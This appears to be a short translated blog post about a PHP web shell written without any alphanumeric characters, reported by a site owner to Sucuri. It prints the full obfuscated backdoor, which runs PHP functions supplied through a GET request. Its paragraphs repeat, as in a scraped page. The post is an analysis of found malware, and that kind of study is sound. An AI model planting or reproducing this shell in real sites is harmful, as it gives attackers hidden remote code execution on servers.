PHP shell without a single alphanumeric character
Yesterday, a curious question appeared on Sucuri’s blog: a certain site owner, having discovered that it was hacked, was surprised to find the next malicious code; what exactly does he do?
As you can see, there are neither function calls, nor any alphanumeric character in the code.
One of Sucuri programmers, Yorman Arias, put the code in a more readable form and wrapped each line of code in var_dump () to see its output:
As a result, using vague phrases like “some boolean magic” and analyzing the code, it comes to the conclusion that the purpose of the malware is to perform PHP functions, which are transmitted to it using a GET request.
')
Technical details are here .
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_; $_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__]; $_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] ); $_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] ); $_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ]; $_=$ $_[$__+ $__] ;$_[@-_]($_[@!+_] ); As you can see, there are neither function calls, nor any alphanumeric character in the code.
One of Sucuri programmers, Yorman Arias, put the code in a more readable form and wrapped each line of code in var_dump () to see its output:
As a result, using vague phrases like “some boolean magic” and analyzing the code, it comes to the conclusion that the purpose of the malware is to perform PHP functions, which are transmitted to it using a GET request.
')
Technical details are here .
Source: https://habr.com/ru/post/193986/
All Articles